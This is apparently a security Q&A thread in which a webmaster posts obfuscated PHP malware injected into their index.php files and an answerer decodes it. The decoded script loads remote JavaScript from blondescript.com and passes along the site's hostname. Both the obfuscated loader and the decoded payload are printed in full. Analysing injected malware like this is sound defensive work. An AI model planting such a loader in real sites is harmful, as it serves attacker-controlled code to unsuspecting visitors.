1

I've just found out that all of my websites on one of my server has been hacked. Some seemingly malicious code was injected into all index.php files:

/*EngineWork*/
if(!defined("FDSJERIUI234FSDF")){
    @ob_start();
    @define("FDSJERIUI234FSDF",1);
    @ini_set("display_errors",0);
    @error_reporting(0);
    echo base64_decode("PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPi8qQGNjX29uIApmdW5jdGlvbiBnbnd6aigpewogdmFyIGt1bnR3ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IGt1bnR3LnNyYyA9ICdodHRwOi8vYmxvbmRlc2NyaXB0LmNvbS9kYXRhL2pxdWVyeV8xLjcuNC5taW4uanM/cj0nK3dpbmRvdy5sb2NhdGlvbi5ob3N0bmFtZTsgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswXS5hcHBlbmRDaGlsZChrdW50dyk7Cn07dmFyIGdkbXp2ID0gc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKXtpZihkb2N1bWVudC5ib2R5ICE9IG51bGwgJiYgdHlwZW9mIGRvY3VtZW50LmJvZHkgIT0gJ3VuZGVmaW5lZCcpe2NsZWFySW50ZXJ2YWwoZ2RtenYpO2dud3pqKCk7fX0sMTAwKTtAKi8KPC9zY3JpcHQ+");
}/*EngineWork*/

What does this code do? Is there a known-attack like this which I should read about to prevent it from coming back?

Benoit Esnard
  • 13,979
  • 7
  • 65
  • 65
herophuong
  • 113
  • 3
  • possible duplicate of [How do I deal with a compromised server?](http://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) – Jens Erat Mar 04 '15 at 09:13

1 Answers1

3

if you run the base64 decode, you get:

<script type='text/javascript'>/*@cc_on 
function gnwzj(){
 var kuntw = document.createElement('script'); kuntw.src = 'http://blondescript.com/data/jquery_1.7.4.min.js?r='+window.location.hostname; document.getElementsByTagName('head')[0].appendChild(kuntw);
};var gdmzv = setInterval(function(){if(document.body != null && typeof document.body != 'undefined'){clearInterval(gdmzv);gnwzj();}},100);@*/
</script>

It injects extra code onto your site.

schroeder
  • 125,553
  • 55
  • 289
  • 326
  • I decoded that as well, it's a bit odd that all the JS script is commented out don't you think? – M'vy Mar 04 '15 at 08:46
  • this explains `@cc_on`: https://msdn.microsoft.com/en-us/library/8ka90k2e(v=vs.94).aspx – schroeder Mar 04 '15 at 09:06
  • It's a conditional comment, IE 4 and later will run it. See [What does @cc_on mean in JavaScript?](https://stackoverflow.com/questions/1341460/what-does-cc-on-mean-in-javascript#1341468) – Ángel Mar 04 '15 at 09:06
  • Shouldn't this answer to be a good answer also explain the effects of the injected JavaScript? – Angelo.Hannes Mar 04 '15 at 09:50
  • @Angelo.Hannes Yep - a full code explanation would be more helpful, but seeing that the OP didn't decode the blob, I figured that a simple decode would be helpful. The OP's code snippet doesn't look malicious, but the decoded code indicates the greater problem. At this point, – schroeder Mar 04 '15 at 18:56
  • There was a race condition bug recently that I remember had similar looking code to this for its PoC - specifically the use of setInterval/clearInterval. Perhaps it's trying to pop your users? – Polynomial Mar 05 '15 at 11:21